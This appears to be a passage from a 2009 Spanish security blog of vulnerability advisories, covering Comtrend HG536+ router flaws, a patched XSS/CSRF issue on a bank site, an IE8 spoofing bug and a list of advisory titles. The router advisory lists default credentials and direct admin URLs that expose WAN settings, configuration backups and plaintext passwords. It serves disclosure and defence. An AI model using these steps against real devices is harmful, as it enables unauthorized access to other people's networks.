el archivo se carga mediante tftp y el servidor está configurado para reiniciar el router después de subir terminado.

Les hago la misma prueba de acceso a través de WAN y obtengo el mismo resultado; reiniciar el router …

Esto puede causar un DoS a un usuario, ya que un atacke puede obligar a reiniciar el router durante todo el tiempo al propietario del router.

###############
Versiones
###############

Comtrend HG536+ router en estos firmwares:

firmware Comtrend A101-302JAZ-C01_R05

firmware A101-302JAZ-C03_R14.A2pB021g.d15h

firmware Poligon, Release.0810b_1525 ADSLZONE v.1.10.08.11b (tftp issue)

#############
Solución
#############

No se dispone de ninguna solución por el momento, ya que por defecto este router está configurado para negar el acceso de conexiones WAN, sólo algo que señalar: este estilo de ataque se puede hacer en caso de que el usuario se encuentre dentro de la LAN o en caso de que el acceso sea de WAN para el servicio TFTP.

################# €nd #############

Thnx To Brink for test with me and for
his patience wen i reboot his router :P
Brinkxd@gmail.com

atentamente:
Lostmon (lostmon@gmail.com)

thz Lost :-)

Caja Granada ha parcheado su web

10 junio 2009 Publicado por cLimbo 0 comentarios
#######################################
Caja Granada ha parcheado su web
URL: http://caja.caja-granada.es/
#######################################

La web de La entidad bancaria Caja granada bajo uno de sus diferentes dominios,se vio afectada por una serie
de errores de validacion de tipo Cross-site scripting (XSS) y de tipo (CSRF)

Estas vulnerabilidades fueron descubiertas y estudiadas por mi hasta descubrir las vulnerabilidades o vectores de ataque, en la parte externa de la web;es decir en la parte no autentificada de la web.

Las vulnerabilidades fueron reportados al equipo de seguridad logica de La entidad, y al servicio de atencion al cliente,
despues del intercambio de unos mails, ha quedado parcheada la parte mas critica de estas vulnerabilidades, la cual
permitia la inclusion de todo un sitio web bajo un frame sobre el dominio principal de la entidad.



Caja Granada vuelve a ser segura en esos puntos reportados.

Ningun cliente de Caja granada pudo verse afectado , ya que las comunicaciones se produjeron con absoluta discreccion por ambas partes.

En el caso de la inclusion del sitio, ademas de haber sido corregido , se nos muestra un mensage advirtiendonos de si de verdad hemos accedido a esa url atraves del dominio de Caja Granada.




No se da ninguna prueba de cocepto por motivos evidentes.

Referencias :

http://www.caja.caja-granada.es/

http://rootdev.blogspot.com/2009/01/la-banca-espaola-ante-el-phising.html

http://rootdev.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html

################## €nd ###################

Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
———

thz Lost ;-)


Vulnerabilidades en Comtrend HG536+

27 abril 2009 Publicado por cLimbo 0 comentarios
##########################################
Vulnerabilidades en Comtrend HG536+
URL del vendedor: www.comtrend.com
Aviso: http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html
Notificación a los vendedores: NO
#########################################

Estos fallos se descubrieron con anterioridad por: Isecauditors, ver aquí: http://www.securityfocus.com/bid/32975

Disculpen las molestias...

#####################
Descripción del vendedor
#####################

El HG536 + es un 802.11g (54 Mbps) con cableadas e inalámbricas redes de área local (WLAN) router ADSL. Cuatro 10/100 Base-T Ethernet la cual proporciona conectividad LAN cableada con una tarjeta wireless 802.11g integrada con un punto de acceso WLAN Wi-Fi para que sea posible la conectividad inalámbrica.

################
Vulnerabilidad
################

Este dispositivo está por defecto con esta configuración:

==========================================
l LAN port IP address: 192.168.1.1
l Local administrator account name: admin
l Local administrator account password: admin
l Local non- administrator account name: user
l Local non- administrator account password: user
l Remote WAN access: disabled
l Remote WAN access account name: support
l Remote WAN access account password: support
l NAT: enable and firewall: disable
l DHCP server on LAN interface: enable
l WAN IP address: none
============================================

Todos estos defectos son debidos a que el control de acceso se basa en un control ineficaz hecho en javascript llamado 'menuBcm.js' que habilita/deshabilita las vistas de los temas en el archivo menu.html, según los usuarios que fueron conectados.

Por esta razón, un usuario normal, puede redireccionar directamente todas las páginas que son parte de la interfaz web por encima de la "pseudo restricción de acceso".

Para explotar todas las vulns, requiere tener acceso.

Vuln 1 => Error al intentar acceder

si un usuario normal no tiene acceso a la cuenta del administrador, basta con introducir en nombre de usuario: "usuario" y contraseña: "usuario" con este usuario se podrá actualizar el firmware, gestionar SNMP, ver el status del router, hacer diagnósticos sobre la conectividad ADSL. Dicho "usuario" en cierta medida es "restringido" a tomar algunas acciones.

Este router en esta versión del firmware tiene un error de control de acceso de un usuario sin privilegios (Usuario-usuario) ya que puede tener acceso a todas las funciones si hacer una solicitud directa a los interesados o archivo funciones.

por ej:

Este usuario no tiene acceso para gestionar la configuración de router pero introduciendo http://192.168.1.1/wancfg.cmd puede configurar la configuración de la WAN.

descarga la configuración =>
http://192.168.1.1/backupsettings.html

ve la clave de la red inalámbrica =>
http://192.168.1.1/wlsecurity.html

Vuln 2 => administrador de contraseñas de texto.

Inicie sesión en el router con el usuario -cuenta de usuario-
y al abrir http://192.168.1.1/password.html se muestra en el código fuente lo siguiente;

=======================
pwdAdmin = 'admin';
pwdSupport = 'support;
pwdUser = 'user';
=======================


###############
Versiones
###############

Comtrend HG536+
firmware A101-302JAZ-C03_R14.A2pB021g.d15h

##############
Solución
#############

No hay aún ninguna solución en este momento.

Por defecto de este router está configurado para negar el acceso de las conexiones WAN, pero este estilo de ataque que se puede hacer con cualquier usuario encontrándose ya sea dentro de la LAN o aún teniendo acceso desde la WAN.

Configurar para negar conexiones WAN y conceder acceso al dispositivo, sólo hay que confiar en los usuarios.

################# €nd #############
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

------------------

thz Lost :-)

IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoofing

06 marzo 2009 Publicado por cLimbo 0 comentarios
###########################################
IE8 beta RC1 res: / / Ieframe.dll / acr_error.htm Spoff
Vendedor: www.microsoft.com
Avisado por: http://lostmon.blogspot.com/2009/03/ie8-beta-c1-resieframedllacrerrorhtm.html
Notificado al vendedor: Disponibilidad del exploit:
############################################


Internet Explorer 8 tiene una vulnerabilidad que permite a los usuarios remotos
spoofear el nombre del dominio en 'Ieframe.dll' que se establece en el archivo 'acr_error.htm' en res: URI es desde donde maneja cualquier usuario remoto pudiendo así
crear una URL maligna que muestra el nombre de dominio, por ejemplo,
"google.com", (pero si clickamos en la url de google nos lleva a otros sítios, es lo llamado spoofing)

#################
Prueba del concepto
#################

PoC IE8 Spoff

#######################################

Thnx To estrella to be my ligth
Thnx to all Lostmon Team.

--
atentamente:
Lostmon (lostmon@gmail.com)

---------------

thz Lost ;-)

Index Vulnerabilidades

22 enero 2009 Publicado por Cross 0 comentarios



Publicaremos poco a poco nuevas vulnerabilidades que vayan apareciendo e intentaremos explicar la forma más sencilla de corregir y/o parchear ésta, a la par que indicando un poco por encima de qué trata cada vulnerabilidad :-)


Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection

Calisto light, light plus and full, SQL Injection and user or Admin bypass

Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability

Google Chrome Instaled extensions arbitrary detection

Safari for windows Invalid SGV text style Webkit.dll DoS

Google Chrome and Chrome frame Prompt DoS

Safari for windows Long link DoS

K-Meleon for windows about:neterror Stack Overflow DoS

Google Services Notifier Chrome extension XSS/CSRF

Notifier for Google Wave Chrome extension XSS/CSRF

Gmail Checker plus Chrome extension XSS/CSRF (Parte II)

Gmail Checker plus Chrome extension XSS

Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion DoS

Flock browser marquee tag DoS

Internet explorer 7 & 8 URL Validation Vulnerability

Internet explorer 6, 7 y 8 URL Validation Vulnerability

Google Chrome Frame null domain XSS

Wowd search client multiple variable XSS

Cofidis.es pudo ver sus datos comprometidos

IE8 Save as Title Bug

Multiple Browsers Fake url folder & file Same origin Spoof

Bing.com WebmasterAuthenticationInformationPage.aspx XSS

Internet explorer pwned Avant Browser

Orca Browser browser:home Persistent XSS vulnerability

Avant Browser browser:home Vulnerabilidades XSS Persistentes

Bing.com Search engine, cache.aspx XSS

Google Chrome About:blank spoof

Google Chrome close() issue

Comtrend HG536+ poligon firmware tftp vulnerable

Caja Granada parchea su web

Ejecución automática de aplicaciones en Safari 4

Vulnerabilidades en Comtrend HG536+

IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoofing

Vulnerabilidad en GMail permite cambiar la contraseña de acceso sin permiso alguno

Entidades bancarias españolas ante el phishing II

Safari 3.2.1 for Windows SafariURL protocol Handler abusse(null Deference)

Safari for Windows 3.2.1 Remote http: URI handler DoS

La banca española ante el phising